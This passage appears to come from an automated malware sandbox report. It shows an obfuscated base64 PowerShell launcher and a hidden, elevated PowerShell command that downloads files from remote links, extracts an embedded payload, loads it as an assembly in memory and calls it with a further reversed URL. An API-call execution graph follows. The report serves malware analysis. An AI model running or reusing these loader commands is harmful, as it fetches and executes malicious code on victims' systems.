QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@RgBy@G8@bQBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@p@Ds@I@@g@C@@J@B0@GU@e@B0@C@@PQ@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@Ds@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@UgBl@GY@b@Bl@GM@d@Bp@G8@bg@u@EE@cwBz@GU@bQBi@Gw@eQBd@Do@OgBM@G8@YQBk@Cg@J@Bj@G8@bQBt@GE@bgBk@EI@eQB0@GU@cw@p@Ds@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@H@@cgBl@HM@cwBl@GQ@QgB5@HQ@ZQBB@HI@cgBh@Hk@I@@9@C@@RwBl@HQ@LQBD@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@LQBi@Hk@d@Bl@EE@cgBy@GE@eQ@g@CQ@ZQBu@GM@V@Bl@Hg@d@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B0@Hk@c@Bl@C@@PQ@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C4@RwBl@HQ@V@B5@H@@ZQ@o@Cc@d@Bl@HM@d@Bw@G8@dwBl@HI@cwBo@GU@b@Bs@C4@S@Bv@GE@YQBh@GE@YQBh@HM@Z@Bt@GU@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@I@@9@Fs@QwBv@G4@dgBl@HI@d@Bd@Do@OgBU@G8@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bt@GU@d@Bo@G8@Z@@g@D0@I@@k@HQ@eQBw@GU@LgBH@GU@d@BN@GU@d@Bo@G8@Z@@o@Cc@b@Bm@HM@ZwBl@GQ@Z@Bk@GQ@Z@Bk@GQ@YQ@n@Ck@LgBJ@G4@dgBv@Gs@ZQ@o@CQ@bgB1@Gw@b@@s@C@@WwBv@GI@agBl@GM@d@Bb@F0@XQ@g@Cg@JwB0@Hg@d@@u@Gk@a@Bi@GQ@Z@Bp@Ek@LwBz@GU@b@Bp@GY@LwBn@HI@bw@u@G0@YQBr@HU@cgBl@HM@YQBk@HM@ZQBo@HQ@ZQBi@C8@Lw@6@HM@Jw@s@C@@Jw@w@Cc@L@@g@Cc@UwB0@GE@cgB0@HU@c@BO@GE@bQBl@Cc@L@@g@Cc@UgBl@Gc@QQBz@G0@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                                                                Imagebase:0x7ff6e3d50000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:6
                                                                                                                Start time:10:43:41
                                                                                                                Start date:01/02/2025
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:7
                                                                                                                Start time:10:43:43
                                                                                                                Start date:01/02/2025
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.ihbddiI/selif/gro.makuresadsehteb//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                                                                                                                Imagebase:0x7ff6e3d50000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Disassembly

                                                                                                                Reset < >

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:25%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:43.3%
                                                                                                                  Total number of Nodes:982
                                                                                                                  Total number of Limit Nodes:49
                                                                                                                  execution_graph 2235 7ff7e74f5af1 2236 7ff7e74f5b25 2235->2236 2237 7ff7e74f5b3c 2235->2237 2238 7ff7e74f59b0 CloseHandle 2236->2238 2242 7ff7e74f5b33 2236->2242 2239 7ff7e74f5c36 2237->2239 2240 7ff7e74f5b52 2237->2240 2237->2242 2238->2242 2243 7ff7e74f5c42 SetDlgItemTextA 2239->2243 2245 7ff7e74f5c57 2239->2245 2240->2242 2246 7ff7e74f5b93 DosDateTimeToFileTime 2240->2246 2291 7ff7e74f86f0 2242->2291 2243->2245 2245->2242 2263 7ff7e74f53b8 GetFileAttributesA 2245->2263 2246->2242 2248 7ff7e74f5bb0 LocalFileTimeToFileTime 2246->2248 2248->2242 2250 7ff7e74f5bce SetFileTime 2248->2250 2250->2242 2251 7ff7e74f5bf6 2250->2251 2260 7ff7e74f59b0 2251->2260 2256 7ff7e74f5ca8 2282 7ff7e74f5478 LocalAlloc 2256->2282 2261 7ff7e74f59e4 CloseHandle 2260->2261 2262 7ff7e74f59cf SetFileAttributesA 2260->2262 2261->2262 2262->2242 2264 7ff7e74f545b 2263->2264 2266 7ff7e74f53da 2263->2266 2264->2242 2270 7ff7e74f55c0 2264->2270 2265 7ff7e74f5442 SetFileAttributesA 2265->2264 2266->2264 2266->2265 2299 7ff7e74f7d28 FindResourceA 2266->2299 2269 7ff7e74f5438 2269->2265 2271 7ff7e74f55f3 2270->2271 2272 7ff7e74f5610 2271->2272 2273 7ff7e74f563d lstrcmpA 2271->2273 2274 7ff7e74f4f2c 24 API calls 2272->2274 2275 7ff7e74f5694 2273->2275 2276 7ff7e74f5634 2273->2276 2274->2276 2275->2276 2277 7ff7e74f56e8 CreateFileA 2275->2277 2276->2242 2276->2256 2277->2276 2279 7ff7e74f571e 2277->2279 2278 7ff7e74f57a1 CreateFileA 2278->2276 2279->2276 2279->2278 2280 7ff7e74f5789 CharNextA 2279->2280 2281 7ff7e74f5772 CreateDirectoryA 2279->2281 2280->2279 2281->2280 2283 7ff7e74f54a6 2282->2283 2284 7ff7e74f54d0 LocalAlloc 2282->2284 2285 7ff7e74f4f2c 24 API calls 2283->2285 2287 7ff7e74f54ff 2284->2287 2290 7ff7e74f54c9 2284->2290 2285->2290 2288 7ff7e74f4f2c 24 API calls 2287->2288 2289 7ff7e74f5522 LocalFree 2288->2289 2289->2290 2290->2242 2292 7ff7e74f86f9 2291->2292 2293 7ff7e74f8750 RtlCaptureContext RtlLookupFunctionEntry 2292->2293 2294 7ff7e74f5cdb 2292->2294 2295 7ff7e74f8795 RtlVirtualUnwind 2293->2295 2296 7ff7e74f87d7 2293->2296 2295->2296 2354 7ff7e74f8714 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2296->2354 2300 7ff7e74f7dc3 2299->2300 2301 7ff7e74f7d63 LoadResource 2299->2301 2307 7ff7e74f4f2c 2300->2307 2301->2300 2302 7ff7e74f7d7d DialogBoxIndirectParamA FreeResource 2301->2302 2302->2300 2306 7ff7e74f5424 2302->2306 2306->2264 2306->2265 2306->2269 2308 7ff7e74f4fa5 LoadStringA 2307->2308 2309 7ff7e74f5105 2307->2309 2310 7ff7e74f5011 2308->2310 2311 7ff7e74f4fcf 2308->2311 2313 7ff7e74f86f0 7 API calls 2309->2313 2312 7ff7e74f508d 2310->2312 2322 7ff7e74f501d LocalAlloc 2310->2322 2336 7ff7e74f8154 2311->2336 2319 7ff7e74f50e6 LocalAlloc 2312->2319 2320 7ff7e74f50a0 LocalAlloc 2312->2320 2315 7ff7e74f51dd 2313->2315 2315->2306 2317 7ff7e74f4fdd MessageBoxA 2317->2309 2319->2309 2330 7ff7e74f5088 MessageBeep 2319->2330 2320->2309 2326 7ff7e74f50d1 2320->2326 2322->2309 2327 7ff7e74f5070 2322->2327 2329 7ff7e74f10bc _vsnprintf 2326->2329 2351 7ff7e74f10bc 2327->2351 2328 7ff7e74f8154 13 API calls 2332 7ff7e74f5173 2328->2332 2329->2330 2330->2328 2333 7ff7e74f517c MessageBoxA LocalFree 2332->2333 2334 7ff7e74f8084 2 API calls 2332->2334 2333->2309 2334->2333 2337 7ff7e74f8194 GetVersionExA 2336->2337 2345 7ff7e74f82c6 2336->2345 2338 7ff7e74f81bd 2337->2338 2337->2345 2341 7ff7e74f81e0 GetSystemMetrics 2338->2341 2338->2345 2339 7ff7e74f86f0 7 API calls 2340 7ff7e74f4fd4 2339->2340 2340->2317 2347 7ff7e74f8084 2340->2347 2342 7ff7e74f81f7 RegOpenKeyExA 2341->2342 2341->2345 2343 7ff7e74f822c RegQueryValueExA RegCloseKey 2342->2343 2342->2345 2343->2345 2346 7ff7e74f8276 2343->2346 2344 7ff7e74f82b5 CharNextA 2344->2346 2345->2339 2346->2344 2346->2345 2348 7ff7e74f80aa EnumResourceLanguagesA 2347->2348 2349 7ff7e74f812d 2347->2349 2348->2349 2350 7ff7e74f80ef EnumResourceLanguagesA 2348->2350 2349->2317 2350->2349 2352 7ff7e74f10eb _vsnprintf 2351->2352 2353 7ff7e74f10dc 2351->2353 2352->2353 2353->2330 3133 7ff7e74f8df0 _XcptFilter 3134 7ff7e74f146e 3135 7ff7e74f14a0 3134->3135 3136 7ff7e74f14c7 GetDesktopWindow 3134->3136 3138 7ff7e74f14b2 EndDialog 3135->3138 3139 7ff7e74f14c3 3135->3139 3143 7ff7e74f4dc8 6 API calls 3136->3143 3138->3139 3141 7ff7e74f86f0 7 API calls 3139->3141 3142 7ff7e74f1540 3141->3142 3145 7ff7e74f4e9f SetWindowPos 3143->3145 3146 7ff7e74f86f0 7 API calls 3145->3146 3147 7ff7e74f14de LoadStringA SetDlgItemTextA MessageBeep 3146->3147 3147->3139 3148 7ff7e74f366e 3149 7ff7e74f3946 EndDialog 3148->3149 3150 7ff7e74f3697 3148->3150 3151 7ff7e74f36ab 3149->3151 3152 7ff7e74f38c2 GetDesktopWindow 3150->3152 3153 7ff7e74f36a7 3150->3153 3154 7ff7e74f4dc8 14 API calls 3152->3154 3153->3151 3155 7ff7e74f3775 GetDlgItemTextA 3153->3155 3156 7ff7e74f36bb 3153->3156 3157 7ff7e74f38d9 SetWindowTextA SendDlgItemMessageA 3154->3157 3166 7ff7e74f379e 3155->3166 3180 7ff7e74f3829 3155->3180 3158 7ff7e74f36c4 3156->3158 3159 7ff7e74f3758 EndDialog 3156->3159 3157->3151 3160 7ff7e74f391c GetDlgItem EnableWindow 3157->3160 3158->3151 3161 7ff7e74f36d1 LoadStringA 3158->3161 3159->3151 3160->3151 3162 7ff7e74f36fd 3161->3162 3163 7ff7e74f371e 3161->3163 3168 7ff7e74f4f2c 24 API calls 3162->3168 3185 7ff7e74f4b70 LoadLibraryA 3163->3185 3165 7ff7e74f4f2c 24 API calls 3165->3151 3167 7ff7e74f37d4 GetFileAttributesA 3166->3167 3166->3180 3170 7ff7e74f383a 3167->3170 3171 7ff7e74f37e8 3167->3171 3184 7ff7e74f3717 3168->3184 3175 7ff7e74f7e08 CharPrevA 3170->3175 3173 7ff7e74f4f2c 24 API calls 3171->3173 3172 7ff7e74f372b SetDlgItemTextA 3172->3151 3172->3162 3176 7ff7e74f380b 3173->3176 3174 7ff7e74f388f EndDialog 3174->3151 3177 7ff7e74f384e 3175->3177 3176->3151 3178 7ff7e74f3814 CreateDirectoryA 3176->3178 3179 7ff7e74f6d9c 31 API calls 3177->3179 3178->3170 3178->3180 3181 7ff7e74f3856 3179->3181 3180->3165 3181->3180 3182 7ff7e74f3861 3181->3182 3183 7ff7e74f6f14 38 API calls 3182->3183 3183->3184 3184->3151 3184->3174 3186 7ff7e74f4bb4 GetProcAddress 3185->3186 3187 7ff7e74f4d7f 3185->3187 3188 7ff7e74f4bd6 GetProcAddress 3186->3188 3189 7ff7e74f4d69 FreeLibrary 3186->3189 3191 7ff7e74f4f2c 24 API calls 3187->3191 3188->3189 3190 7ff7e74f4bfb GetProcAddress 3188->3190 3189->3187 3190->3189 3192 7ff7e74f4c1d 3190->3192 3193 7ff7e74f3723 3191->3193 3194 7ff7e74f4c31 GetTempPathA 3192->3194 3199 7ff7e74f4c7f FreeLibrary 3192->3199 3193->3151 3193->3172 3195 7ff7e74f4c46 3194->3195 3195->3195 3196 7ff7e74f4c4e CharPrevA 3195->3196 3197 7ff7e74f4c68 CharPrevA 3196->3197 3196->3199 3197->3199 3199->3193 3200 7ff7e74f5aae GlobalAlloc 2355 7ff7e74f8460 2374 7ff7e74f8bf4 2355->2374 2359 7ff7e74f84ab 2360 7ff7e74f84bd 2359->2360 2361 7ff7e74f84da Sleep 2359->2361 2362 7ff7e74f84cd _amsg_exit 2360->2362 2365 7ff7e74f84e7 2360->2365 2361->2359 2362->2365 2363 7ff7e74f8586 _IsNonwritableInCurrentImage 2366 7ff7e74f866f _ismbblead 2363->2366 2367 7ff7e74f85f4 2363->2367 2364 7ff7e74f8569 _initterm 2364->2363 2365->2363 2365->2364 2373 7ff7e74f854a 2365->2373 2366->2363 2378 7ff7e74f2d70 GetVersion 2367->2378 2370 7ff7e74f8646 2372 7ff7e74f864f _cexit 2370->2372 2370->2373 2371 7ff7e74f863e exit 2371->2370 2372->2373 2375 7ff7e74f8469 GetStartupInfoW 2374->2375 2376 7ff7e74f8c20 6 API calls 2374->2376 2375->2359 2377 7ff7e74f8c9f 2376->2377 2377->2375 2379 7ff7e74f2de9 2378->2379 2380 7ff7e74f2d97 2378->2380 2402 7ff7e74f2edc 2379->2402 2380->2379 2381 7ff7e74f2d9b GetModuleHandleW 2380->2381 2381->2379 2383 7ff7e74f2db3 GetProcAddress 2381->2383 2383->2379 2385 7ff7e74f2dce 2383->2385 2385->2379 2386 7ff7e74f2ea5 2388 7ff7e74f2eb1 CloseHandle 2386->2388 2389 7ff7e74f2ebd 2386->2389 2388->2389 2389->2370 2389->2371 2393 7ff7e74f2e4f 2393->2386 2394 7ff7e74f2e84 2393->2394 2395 7ff7e74f2e59 2393->2395 2398 7ff7e74f2ea0 2394->2398 2399 7ff7e74f2e8d ExitWindowsEx 2394->2399 2397 7ff7e74f4f2c 24 API calls 2395->2397 2400 7ff7e74f2e7f 2397->2400 2518 7ff7e74f1bf4 GetCurrentProcess OpenProcessToken 2398->2518 2399->2386 2400->2386 2400->2394 2403 7ff7e74f8da9 2402->2403 2404 7ff7e74f2f21 memset memset 2403->2404 2526 7ff7e74f51f8 FindResourceA SizeofResource 2404->2526 2407 7ff7e74f30dd 2410 7ff7e74f4f2c 24 API calls 2407->2410 2408 7ff7e74f2f7b CreateEventA SetEvent 2409 7ff7e74f51f8 7 API calls 2408->2409 2411 7ff7e74f2fba 2409->2411 2434 7ff7e74f3101 2410->2434 2412 7ff7e74f2fbe 2411->2412 2413 7ff7e74f2ffd 2411->2413 2416 7ff7e74f30cb 2411->2416 2414 7ff7e74f4f2c 24 API calls 2412->2414 2417 7ff7e74f51f8 7 API calls 2413->2417 2447 7ff7e74f2fdc 2414->2447 2415 7ff7e74f86f0 7 API calls 2418 7ff7e74f2dfa 2415->2418 2531 7ff7e74f7320 2416->2531 2420 7ff7e74f3014 2417->2420 2418->2386 2448 7ff7e74f3214 2418->2448 2420->2412 2422 7ff7e74f3026 CreateMutexA 2420->2422 2422->2416 2424 7ff7e74f304a GetLastError 2422->2424 2423 7ff7e74f30ec 2425 7ff7e74f30f5 2423->2425 2426 7ff7e74f3106 FindResourceExA 2423->2426 2424->2416 2427 7ff7e74f305d 2424->2427 2558 7ff7e74f2034 2425->2558 2429 7ff7e74f313c 2426->2429 2430 7ff7e74f3127 LoadResource 2426->2430 2431 7ff7e74f3072 2427->2431 2432 7ff7e74f308a 2427->2432 2436 7ff7e74f3145 #17 2429->2436 2437 7ff7e74f3151 2429->2437 2430->2429 2435 7ff7e74f4f2c 24 API calls 2431->2435 2433 7ff7e74f4f2c 24 API calls 2432->2433 2439 7ff7e74f30a4 2433->2439 2434->2415 2440 7ff7e74f3088 2435->2440 2436->2437 2437->2434 2438 7ff7e74f3162 2437->2438 2573 7ff7e74f3d34 GetVersionExA 2438->2573 2439->2416 2441 7ff7e74f30a9 CloseHandle 2439->2441 2440->2441 2441->2434 2446 7ff7e74f7d28 28 API calls 2446->2447 2447->2434 2449 7ff7e74f323e 2448->2449 2450 7ff7e74f3269 2448->2450 2452 7ff7e74f325c 2449->2452 2666 7ff7e74f6294 2449->2666 2686 7ff7e74f61d4 2450->2686 2845 7ff7e74f4064 2452->2845 2457 7ff7e74f3368 2461 7ff7e74f86f0 7 API calls 2457->2461 2463 7ff7e74f2e07 2461->2463 2462 7ff7e74f3283 GetSystemDirectoryA 2464 7ff7e74f7e08 CharPrevA 2462->2464 2494 7ff7e74f63dc 2463->2494 2465 7ff7e74f32ae LoadLibraryA 2464->2465 2466 7ff7e74f32fb FreeLibrary 2465->2466 2467 7ff7e74f32c7 GetProcAddress 2465->2467 2469 7ff7e74f33a5 SetCurrentDirectoryA 2466->2469 2470 7ff7e74f3316 2466->2470 2467->2466 2468 7ff7e74f32e2 DecryptFileA 2467->2468 2468->2466 2471 7ff7e74f333f 2469->2471 2477 7ff7e74f33c3 2469->2477 2470->2469 2472 7ff7e74f3322 GetWindowsDirectoryA 2470->2472 2475 7ff7e74f4f2c 24 API calls 2471->2475 2472->2471 2474 7ff7e74f338c 2472->2474 2473 7ff7e74f3451 2473->2457 2480 7ff7e74f23c0 19 API calls 2473->2480 2487 7ff7e74f3479 2473->2487 2749 7ff7e74f6f14 2474->2749 2478 7ff7e74f335d 2475->2478 2477->2473 2481 7ff7e74f342d 2477->2481 2484 7ff7e74f33fd 2477->2484 2864 7ff7e74f7958 GetLastError 2478->2864 2480->2487 2777 7ff7e74f5f80 2481->2777 2483 7ff7e74f349a 2483->2457 2491 7ff7e74f34b5 2483->2491 2488 7ff7e74f7d28 28 API calls 2484->2488 2485 7ff7e74f3362 2485->2457 2487->2483 2799 7ff7e74f41b4 2487->2799 2489 7ff7e74f3428 2488->2489 2489->2457 2865 7ff7e74f7984 2489->2865 2875 7ff7e74f4a54 2491->2875 2495 7ff7e74f6404 2494->2495 2496 7ff7e74f643c LocalFree LocalFree 2495->2496 2497 7ff7e74f6419 SetFileAttributesA DeleteFileA 2495->2497 2504 7ff7e74f6463 2495->2504 2496->2495 2497->2496 2498 7ff7e74f6501 2499 7ff7e74f6577 2498->2499 2501 7ff7e74f651d RegOpenKeyExA 2498->2501 2500 7ff7e74f86f0 7 API calls 2499->2500 2502 7ff7e74f2e0e 2500->2502 2501->2499 2503 7ff7e74f654e RegDeleteValueA RegCloseKey 2501->2503 2502->2386 2502->2393 2508 7ff7e74f23c0 2502->2508 2503->2499 2504->2498 2505 7ff7e74f64e4 SetCurrentDirectoryA 2504->2505 2506 7ff7e74f7ea0 4 API calls 2504->2506 2507 7ff7e74f2034 16 API calls 2505->2507 2506->2505 2507->2498 2509 7ff7e74f23d1 2508->2509 2510 7ff7e74f2478 2508->2510 2512 7ff7e74f2471 2509->2512 2513 7ff7e74f23db 2509->2513 3111 7ff7e74f2234 GetWindowsDirectoryA 2510->3111 3108 7ff7e74f2308 RegOpenKeyExA 2512->3108 2514 7ff7e74f246b 2513->2514 2516 7ff7e74f23eb RegOpenKeyExA 2513->2516 2514->2393 2516->2514 2517 7ff7e74f2420 RegQueryValueExA RegCloseKey 2516->2517 2517->2514 2519 7ff7e74f1c34 2518->2519 2520 7ff7e74f1c57 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2518->2520 2522 7ff7e74f4f2c 24 API calls 2519->2522 2520->2519 2521 7ff7e74f1cd4 ExitWindowsEx 2520->2521 2521->2519 2523 7ff7e74f1c50 2521->2523 2522->2523 2524 7ff7e74f86f0 7 API calls 2523->2524 2525 7ff7e74f1d02 2524->2525 2525->2386 2527 7ff7e74f5243 2526->2527 2528 7ff7e74f2f6b 2526->2528 2527->2528 2529 7ff7e74f524c FindResourceA LoadResource LockResource 2527->2529 2528->2407 2528->2408 2529->2528 2530 7ff7e74f528b memcpy_s FreeResource 2529->2530 2530->2528 2532 7ff7e74f77de 2531->2532 2541 7ff7e74f736a 2531->2541 2533 7ff7e74f86f0 7 API calls 2532->2533 2535 7ff7e74f30d9 2533->2535 2534 7ff7e74f7442 2534->2532 2537 7ff7e74f745f GetModuleFileNameA 2534->2537 2535->2407 2535->2423 2536 7ff7e74f7395 CharNextA 2536->2541 2538 7ff7e74f7494 2537->2538 2539 7ff7e74f7487 2537->2539 2538->2532 2607 7ff7e74f7fb8 2539->2607 2541->2532 2541->2534 2541->2536 2542 7ff7e74f794b 2541->2542 2545 7ff7e74f74b0 CharUpperA 2541->2545 2551 7ff7e74f7615 CharUpperA 2541->2551 2552 7ff7e74f75be CompareStringA 2541->2552 2553 7ff7e74f7673 CharUpperA 2541->2553 2554 7ff7e74f770a CharUpperA 2541->2554 2555 7ff7e74f7548 CharUpperA 2541->2555 2556 7ff7e74f7f48 IsDBCSLeadByte CharNextA 2541->2556 2612 7ff7e74f7e08 2541->2612 2619 7ff7e74f88c8 RtlCaptureContext RtlLookupFunctionEntry 2542->2619 2545->2541 2546 7ff7e74f78e7 2545->2546 2616 7ff7e74f1bc0 2546->2616 2549 7ff7e74f7904 ExitProcess 2550 7ff7e74f78f8 CloseHandle 2550->2549 2551->2541 2552->2541 2553->2541 2554->2541 2555->2541 2556->2541 2559 7ff7e74f2213 2558->2559 2562 7ff7e74f203d 2558->2562 2559->2434 2560 7ff7e74f2204 2561 7ff7e74f86f0 7 API calls 2560->2561 2561->2559 2562->2560 2563 7ff7e74f20cd FindFirstFileA 2562->2563 2563->2560 2564 7ff7e74f20ef 2563->2564 2565 7ff7e74f2194 2564->2565 2566 7ff7e74f2129 lstrcmpA 2564->2566 2568 7ff7e74f21ca FindNextFileA 2564->2568 2571 7ff7e74f7e08 CharPrevA 2564->2571 2572 7ff7e74f2034 8 API calls 2564->2572 2569 7ff7e74f21a5 SetFileAttributesA DeleteFileA 2565->2569 2567 7ff7e74f2149 lstrcmpA 2566->2567 2566->2568 2567->2564 2567->2568 2568->2564 2570 7ff7e74f21e6 FindClose RemoveDirectoryA 2568->2570 2569->2568 2570->2560 2571->2564 2572->2564 2574 7ff7e74f3d8a 2573->2574 2578 7ff7e74f3d91 2573->2578 2575 7ff7e74f4f2c 24 API calls 2574->2575 2587 7ff7e74f3ffb 2575->2587 2576 7ff7e74f86f0 7 API calls 2577 7ff7e74f316a 2576->2577 2577->2434 2588 7ff7e74f1258 2577->2588 2578->2574 2580 7ff7e74f3ef5 2578->2580 2578->2587 2625 7ff7e74f2898 2578->2625 2580->2574 2581 7ff7e74f3fae MessageBeep 2580->2581 2580->2587 2582 7ff7e74f8154 13 API calls 2581->2582 2583 7ff7e74f3fc1 2582->2583 2584 7ff7e74f3fca MessageBoxA 2583->2584 2585 7ff7e74f8084 2 API calls 2583->2585 2584->2587 2585->2584 2587->2576 2589 7ff7e74f1421 2588->2589 2590 7ff7e74f12a8 2588->2590 2591 7ff7e74f86f0 7 API calls 2589->2591 2657 7ff7e74f1130 LoadLibraryA 2590->2657 2593 7ff7e74f1446 2591->2593 2593->2434 2593->2446 2595 7ff7e74f12b9 GetCurrentProcess OpenProcessToken 2595->2589 2596 7ff7e74f12e3 GetTokenInformation 2595->2596 2597 7ff7e74f140c CloseHandle 2596->2597 2598 7ff7e74f130c GetLastError 2596->2598 2597->2589 2598->2597 2599 7ff7e74f1321 LocalAlloc 2598->2599 2599->2597 2600 7ff7e74f133e GetTokenInformation 2599->2600 2601 7ff7e74f13fd LocalFree 2600->2601 2602 7ff7e74f1368 AllocateAndInitializeSid 2600->2602 2601->2597 2602->2601 2604 7ff7e74f13b1 2602->2604 2603 7ff7e74f13ed FreeSid 2603->2601 2604->2603 2605 7ff7e74f13be EqualSid 2604->2605 2606 7ff7e74f13e2 2604->2606 2605->2604 2605->2606 2606->2603 2608 7ff7e74f8029 2607->2608 2609 7ff7e74f7fd8 2607->2609 2608->2538 2610 7ff7e74f7fe0 IsDBCSLeadByte 